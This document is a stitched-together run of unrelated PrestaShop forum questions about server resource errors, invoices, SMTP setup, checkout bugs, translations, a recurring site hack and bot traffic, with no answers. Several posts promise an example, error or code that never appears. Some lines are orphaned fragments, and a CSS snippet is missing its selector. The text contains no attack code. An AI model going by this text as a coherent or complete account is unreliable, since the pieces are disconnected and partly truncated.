A couple of days ago the website randomly started returning an error page saying 

Insufficient Storage

The method could not be performed on the resource because the server is unable to store the representation needed to successfully complete the request. There is insufficient free space left in your storage allocation.

Additionally, a 507 Insufficient Storage error was encountered while trying to use an ErrorDocument to handle the request.

Not every time, just a couple of times and then it went back to normal.

I have plenty of storage on my shared hosting so that is not the issue. A quick googling told me that it was caused by hitting cpu or db resource limits so i went to cpanel resource usage page and there was a spike in cpu usage, number of processes and faults (i'll attach some screenshots).
As you can see it's not high all the time, it stays high and occasionally fault for some hours, then goes down with no fault for some time and then back up. Could this be bots accessing the website?
Before this started, nothing was changed other than usual products uploading and modifications. No modules were installed or modified.
After it started i tried to "fix it" by updating to the latest non major version (from 1.7.8.5 to 1.7.8.11 i think), and update the theme. Did not help, not for long at least. I then tried to clean the db by deleting old abandoned carts and logs. Back office sped up but still did not help and i occasionally got the error page while visiting the website (either front or back office). I think that while i put the website into maintenance mode to do some work the usage dropped, so this might be a clue.
As you can see from the screenshots, on a normal day the usage is steady low, few processes running. When this issue started usage goes gradually up until it starts having like 20 processes, hitting limits and then faulting.
I could try to disable modules, but i would have to do it while out of maintenance and clients would load a broken page, so i'm hoping there is a better way that helps me understand what actually are those processes, what is spawning them and if they are caused by a fault module or something.
I have access to cpanel, db and ssh.

PrestaShop 1.7.1.2

I am running Prestashop 1.7.6.9 and am having an occasional issue. From what I can tell randomly the invoice quick link button is missing from the orders view. Invoice Button Missing Image

The common factors seem to be that the orders are from the payment method “Paypal” (Coming from Prestashop checkout) and most of the time the order has the status payment accepted twice as shown here and here

The issue was not in the original release I installed and has only appeared after updating the PS_checkout module(I think, several other modules were updated at the same time but I don’t think they interact with the checkout process. I have also NOT upgraded the core Prestashop version from install so presume this isn’t an issue.)

Can anyone suggest possible solutions to the problem?

Things already tried

A temporary fix is I can go into the database and in the orders table set the invoice number and date to be the correct values. (The invoice is correctly created and visible in the Documents section)

I have checked the order status config and it is set to generate the invoice when the status payment accepted is applied.

I have attempted changing the order status to another value and setting it back and this does not work.

I have checked the tables in the database for errors but haven't found any

If i go in to the BO and view Customers > Shopping Carts, the product information is visible here.

I am using Realex payment module and to make sure it's not the module that's causing the problem I switched the payment option to COD (cash on delivery) and I experienced the exact same problem.

The customer order confirmation (HTML) DOES show the product information and seems to be working fine but the PDF generated invoice does not show any product information at all.

After viewing the error logs in the BO I get the following error:

Frontcontroller::init - Cart cannot be loaded or an order has already been placed using this cart

Can anyone shed some light on this issue?

UPDATE - I just installed the PayPal module and I am getting the same problem although payment is still going through.

after several presta shop module updates (and some 3rd party modules as well) yesterday a customer notified us that the "order button" in the checkout is broken.

I checked and found that in fact the following behaviour occurs:

After entering name, address and selecting a shipping service in the final stage of the checkout the red banner (Please make sure you've chosen a payment method and accepted the terms and conditions) and a greyed out "place order" button is shown.

Now based on the payment selection the following happens:

1) Pay by credit card (Stripe module): banner stays - button remains grey - no entry sign shows when touching the button - BUT a click results in a succesful order!

2) Pay by bank wire (original presta module): as 1) but click does not issue an order but jumps the cursor back to the input of the Pay by card text element! but if I disable or uninstall the Stripe module - just nothing happens.

3) Bank transfer payment with discount (3rd party): same as 2)

4) Paypal: Once selected both the banner and the button disappear - order is only possible with the yellow "pay with paypal" button.

I've just in stalled new Prestashop 1.7.7.0 and have problem with e-mail. While trying to send test message I 've got  that error message:

Expected response code 354 but got code "554", with message "554 5.5.1 Error: no valid recipients "

While trying to send mail using contact form there is not error message, but the mail is not send.

I would be grateful for any advice haw to solve it.

I am using PrestaShop 9 on OVH hosting (PHP 8.1).

I am trying to configure SMTP with an OVH Email Pro mailbox.

Here are my tests:

With an OVH MX Plan account:

TLS + port 465 → works

With an OVH Email Pro account:

No encryption + port 587 → works

TLS + port 465 → does NOT work

TLS + port 587 → does NOT work

Error message:

Connection could not be established with host "ssl://pro3.mail.ovh.net:465": stream_socket_client(): Unable to connect to ssl://pro3.mail.ovh.net:465 (Connection timed out)

TLS works correctly with MX Plan on the same server.

Has anyone experienced this issue with OVH Email Pro?
Should a different SMTP server be used?

I would like to add an external link to a subcategory so that when a customer clicks on that subcategory, he is redirected to another external website. Both in the main manu and in the category tree. 

Let's imagine that I have the following categories and subcategories:

Laptops
Mobile phones
- Motorola
- Samsung

The idea is that if someone clicks on ‘Motorola’, they will be taken to www.motorola.com. I have managed to do this for the top menu modifying as follows the "generateCategoriesmenu" function in "modules\ps_mainmenu\ps_mainmenu.php", but I haven't been able to do it for the category tree on the left column.

We're experiencing a bug in PrestaShop version 9. Every time a product is cloned, it doesn't update the name, creating endless copies of copies of copies.

I came up with a free way to embed responsive videos in product descriptions and any other HTML fields on the website.

1. Enable the "Allow iframes on HTML fields" option (if it's disabled) on the "Shop Parameters > General" tab in the Back Office.
2. Create a child theme (if you haven't already) to enable custom CSS to be added.
3. Add the following to the themes/child_theme/assets/css/custom.css (this code makes the YouTube video responsive so it looks good on desktop, tablet and mobile):

   	padding-bottom: 56.25%;
   	height: 0;
   	overflow: hidden;
   	max-width: 100%;
   	margin-bottom: 1rem;

4. Upload the video to YouTube and choose either "Public" or "Unlisted" depending on whether you want the video searchable on your channel.
5. Click the "Share" button on the video and then choose "Embed". Copy the <iframe> code to the product description or other HTML field in the Back Office and then add <p class="embed-container"> before the <iframe> code and </p> after the </iframe> code.

I used to have a brilliant little module to do a task, which was to list all products and quantities within a certain date range, that were tagged as 'Payment Recieved'

Unfortunatly that module has not been maintained for the last couple of years.

So I am asking if there are any Mysql experts to help construct a Mysql statement to do that task.

What can i do to fix this. In my Clone i tried to remove all addes costumers yet this wasnt solving it.

Here are the things I've done to secure my server (I do this over and over)

1. Delete all the Prestashop files from the server, retaining the (cleaned, if necessary) files from the old install, like config and image files
   1. config/settings.inc.php
   2. folder with name of custom-named admin area (let's call it "custom-admin/")
   3. img/ images used for header ("logo.png" or "your-store-name.png")
   4. img/c folder (categories)
   5. img/p folder (products)
       

      My sites keep getting hacked and it's a particular hack that inserts escaped html. Then it progresses to spam being sent from my server and shutting down the shared hosting account for being over resources.

      Here's an example:

2. Reinstall Prestashop (or Wordpress), deleting all the infected files and replacing it with a clean install Change the mysql user password for the install
3.  Change the FTP password
4.  Change the Cpanel password

They're not getting in through FTP or Cpanel or those things would work.

I have managed to cut down attacks on the Wordpress site using Wordfence and enabling the shared-hosting settings. However I still can't figure out what's attacking, and the site logs are too massive and I don't know what I'm looking for.

Any insight would be appreciated... if I can't get this under control I'm going to have to move back to the Wordpress solution because at leas they have a tool that cuts down hacking.

Not sure what to do now.

This "problem" has been taunting me for some wile now, both with Prestashop 1.6, 1.7 and 8.0.

Whenever I update any product images, maybe because of better quality, new design etc., the old photos are still generated in invoice pdf and delivery slips pdf. I have regenerated all the images / thumbnails in BO but they won't update in the PDF's. Cleared cache both in BO and manually.

We would say VAT included or VAT excluded instead.

I want my store to have a local look and feel and this is annoying me. Ive used other ecommerce platforms over the years and this is my first with prestashop but there was always somewhere i could go and either edit the .php or similar on the server or change a setting on the admin panel.

Is there somewhere i can make this change to my store so it feels like a local store and not an international store?

I have tried asking AI but i am getting some generic try here or could be there fluffed response.

When I try to add just 1 product to the cart, the cart empties. I have this issue only on the mobile version of PS 1.7.5. If I change the quantity to 2 or add a different product, it's working fine.

I have some products on my store (catalogue mode) for which I have inserted also embed movies from youtube. Unfortunately this is not possible anymore even I didn't modified/update nothing to my website.. only maybe youtube made updates. 

I can't do any modifications to products that have movies on Description page because when I try to save I get the message "Invalid description field"

I'm using prestashop 1.7.6.7.

Did you face such problems, any ideea how could I solve the problem?

When trying to add values to a Color/Texture Attribute, there is no color picker. Oddly, when trying to add values to a Dropdown Attribute, there is a color picker. It seems like that should be the other way around...

It seems that APC is enabled but the extension is not available. Not being an expert I wondered if I could disable it then maybe I could get into the Admin. Is there a file I can modify to disable APC?

So in previous PS versions there's custom.css file sitting in every theme and adding new css rules to this file you can change your site's look and basically feel. But in PS 9.x.x. there's no such file and adding it to theme's dir doe's nothing. Noticed that PS 9 generates themeXXX.css file, uses it and saves in cache dir. IS custom.css file hiding somewhere or in case it's totally different from previous versions, what is the best way to customize website look (like backgrounds, shadows, lines and etc.)?

I run a Prestashop store which is connected to my Sage ERP with a connector. This connector sends orders from PS to ERP.

When it does this, it also creates customers in the ERP.

My ERP key field for customers is an internal id. The PS key field for customers is email.

When the connector loads orders in ERP, it fills the billing address attached to the PS order.

But, if in the future, the client changes the billing address, my software still associates the new order to the previous billing address.

While the main/easy solution would seem to modify the connector behaviour, the vendor of the connector isn't willing to do it.

So, I'm wondering if there is a way or a module that "locks" a PS account to a billing address, so that i won't have this problem with the connector later.

I already gone to Admin -> Catalog -> Products  then to Categories section, and click Add New Category button, but my previously created category does not appears even using the search text field, it only select categories from initial data from installation, no new categories.

What can I do.

I'm trying to remove the "Free" in the shopping cart text. It shows as free even when a customer is logged in until choosing their shipping address. After a lot of research I am unable to use the same solutions used in previous versions of Prestashop. I've been looking at the back office translations and I found one expression marked "Free" but it has no description and changing it did not seem to help. Beyond that I have been looking through my theme files and I'm just not proficient enough a coder to find the reference file.

I have what I suspect to be a potential fraudster who regularly registers a new account during checkout, but their address is fake/incomplete , their email is either fake or temporary and their IP always changes. It is always mail*******@protonmail.com (where * are numbers), which suggests it might be Protonmail's hide-my-email aliases. I ban the email and IP, but that is no help in this case.

What I would like to do is block all mail*@protonmail.com email addresses from registration. It there a way to do this in PS 8.2.1?

I have a problem with the standard Contact Form of Prestashop 1.7.8.8: If I enable the Server Cache, the module doesn't send any email and the page refresh without any error message. What I can check to solve this problem?

i´ve tried to reset the payment module and redone the countries and zones several times but no luck yet.

Can anyone point me in the right direction as to were i might of messed up?

My surprise was that the modules are not sorted anymore on categories, only few of them, but the most are found on "Others category"

More categories are empty now as could be seen on the picture: Administration, Design, Promotions, Product page and others.

Any ideea why is that happened and how could be solved?

I've copied the entire folder from /shop/ where is is currently, and put it in /shop9test/.

I've backed up the database and restored to a new database, changed the connection details in the parameters file.

And I've updated the shop url in the physical_uri filed in the database itself.

But, no matter what I do when I visit mydomain/shop9test it redirects me to mydomain/shop

I have installed a module on main page to show product categories on main page. text given below the images is clickable and conntected with the related category. but category thumbnail above the text is not clickable and i want to make that image clickable too. and link with related category. live can be seen here . in "Shop by Room" section, there are images of some categories, and below is the category name (text) category name is clickable link but the thumbnail is not. i want to make thumbnail clickbale too. when some one click on the image it should take to the related category. how to do that?

I have disabled taxes on the BO, then deleted all the taxed but still a text on the product page showing "VAT Included" or "VAT Exluded" (screenshot attached). I want to remove that text completly. Please guide how to remove that. I am using Prestahop 9.

i have a problem to update modules, clear cache backend and per ftp, cannot upgrade prestashop from 8.1.5 to 9.0.0 for example. on debug mode it shows me this errors. to login in backend i only can bring back the backup. but the error still there in only the cache files shows the backend and frontend. does anybody have an idea to solve it?

I am using Warehouse theme on Prestashop 8.2.

When I add a product to the cart a message appears in the cart saying "Spend .... more to get free shipping!".

It's great, but I want the message to be translated in my language (Bulgarian). Everything else is in Bulgarian, only this message appears in English.

Please help me translate it.

i am using prestashop8.2.3. I have set image setting to webp.
all product images are showing too blury on main page and category pages. when I open same image on other website dotn't show blury, but when I uploaded same images in my website, all look too blury. Please see example here. And kindly guide me how to show them as normal.

Simple Page at localhost takes 7-10 seconds to load, while the same page on the production server loads in 0.5 seconds. If the local server has to perform a more complicated operation, I have to wait up to a few minutes ! I can't even load the module or themes. I tried different PHP version , tried  extended the php.ini settings  (memory_limit=8G, max execution=3500, etc...)

The old version prstashop 1.6.2 at localhost it worked very well, now I can not do anything.

Please Help, I can not work at this. What is wrong?

I am new to PrestaShop and I experience strange issue:

I create/duplicate new products. I fill in unique name for each product, they appear correctly in the shop, but in the admin panel they appear with "N/A" or "Copy of". You can see the pics I've attached.

I couldn't find how to translate this string. "I agree to the terms and conditions and the privacy policy".

I couldn't find it in the "classic" theme translation, neither in my theme "warehouse"

I'm new to prestashop and I'm having trouble setting up the cart.

I set up to restore the products in the cart after logging in to the account, but another problem occurred:

1. I login in my account and add products to the cart.
2. Then I log out of the account.
3. Then I log in again and the products are in the cart. This is good.
4. Then I log out of the account.
5. Then I add products without logging in. Then I log in to my account so that these products can be added to the other products in the cart.
7. BUT the products from the previous login in the account (dot 1) are missing. The cart contains only the items I added before logging in to my account.

Please help me that fix this problem.

To clarify what I'm asking; Is this something that is possible to do with a vanilla setup or does anyone know a plugin that can accomplish this task?

Hosting support told me to try and change the php versions. I tried everything from 7.0 to 8.4 and didn't make any difference (except when i selected 7.0, then the front office also stopped working), apart from that they can't help me. Current one is 7.4

I'm not a developer so I'm pretty lost trying to fix this. Any ideas?

On a similar note, why do the friendly URL's have the category id in them?  I would think the url mysite.com/cooking would have much more SEO value than mysite.com/21-cooking.  Its a bit annoying.  I am almost ready to abandon a couple weeks worth of work and go back to wordpress.

After a fresh installation of PrestaShop 9.0 (running on PHP 8.4), it is impossible to update the native modules. Each attempt fails, even though the installation itself completed successfully.

I get a white screen when I go to the first checkout page. When I turn on debug I get the following error:

I do not get this error on my v9.0 staging site. I cannot see any difference between the two.

I am trying and failing to find a certain translation that I want to change. I searched in every module I could think of under  "international -> Translations", front end -> current theme, also text search via ftp on the server.

The mistranslation is for the login screen: the button "show password" should be "mostra" in italian, but it says spettacolo, which means show in the sense of theatre.

Looking at the source code, it shows this:

I’m having trouble with the PrestaShop import tool.

Here’s what I did:

Installed a fresh PrestaShop instance with demo products.

Exported the demo products to CSV.

Deleted all demo products from the shop.

Tried to import the same CSV back.

But during the import I get an error.

It seems impossible to import any product, no matter what i tried, i`m struggling with this problem for whole week

I am trying to set up "Notify me when available" option, but it doesn't seem to work. I put my e-mail address into the form, and the success message saying I will be notified displays. Then, when I update the stock for this product - so it is available again, I get no e-mail whatsoever.

Interesting thing is, when I put my e-mail into the form again (even though I've changed stock Qtys in the meantime - so the product was available, and unavailable again), it says "You already have an alert for this product". So, the email logging is just fine. What doesn't work is sending the e-mail and removing the logged addresses from the database. Or, perhaps - is setting the stock qty from 0 to positive number not considered available? Do I have to change other product parameters so it becomes available? (I can add it to cart and purchase it, it seems available to me)

I tried to look into email logs inside Advanced parameters > Email, and it is not there as well, even though email logging is turned on.

What could be the problem?

IMPORTANT EDIT: Mea culpa. It works when I edit the stock quantity (change it from 0 to positive number) in the back office. It does not work when I change it programatically using my stock sync functions.This is the function that updates qty every minute. What could be the problem?

I'm trying to update my stock using a CSV to change the price and quantity of a product. The process is easy but I found a error due to the fact that the importer of Stock  change the principal category of each products after import. Is an error from Prestashop?

Does anyone know how to push presta to use svg file for header logo instead of jpg, png...?

The svg file have much clearer resolution than other and I would love to use it.

go to modules catalog while I am signed in and it says firewall needs to be disabled.

I disabled all firewalls on my PC Mcafee is completely turned off. Checked windows firewall turned off

Our website is being saturated via a new kind of attack from spam ip addresses.

It seems like the bots use a functionality embedded to PrestaShop to create indexes of faceted search, filtering products in specific categories  by brand. I alredy:

-  tried to disable the affected category (they move to another one)

- disable and even delete faceted search module (the controller keeps working)

I run on PrestaShop 1.7.8.5.

Is there a way to permanently disable the controller that responds to the "?q=" request in a link?

Whenever I do ANYTHING in the 1.6.0.10 Prestashop Multistore Admin the page has to be refreshed at least once before I start otherwise I will save old data.

For example if I want to change stores in admin I have to:

1. Select the new store: page loads but showing old store
2. Refresh the page: Page loads still showing old store
3. Reselect the new store again: If lucky the new store will load, otherwise continue again from step 1

Another example:

You go to edit a CMS page that has been modified some time before. If you do not remember to refresh the page after it loads BEFORE adding any new content, you will end up adding new content to the content before the last modification. So the current data does not load when you first go to the page.

This also happens when modifying product details and for just about anything if not everything.

As a result if you do not constantly refresh on every page nearly every step of the way, you end up with corrupted data without even knowing it.

It is such a dangerous pain. In time I hope to afford to put on an admin person but there is no way in the world could you have someone else working in the backend as it is way to easy to screw it all up and very slow to do simple things like changing stores. It can take about 3minuts sometimes to manage a change in store.

Cache is off.

Any ideas?

Now the website displays error on both the front and backend. If deleted the module files (I couldn't uninstall as I couldn't login to the backend). Can anyone help please?

We are using Prestashop 8.2 and default country is set "United States", and we enabled "Canada" recently. 

also imported Canada's states (see the attached Canada image). 

During new account registration, customer selected "Canada" (refer to Canada-2 image) in dropdown menu, but the state will not be reflected and provides Canada's state, still giving United States State's list (refer to Canada-3 image)

Any ideas how to fix this issue on the states
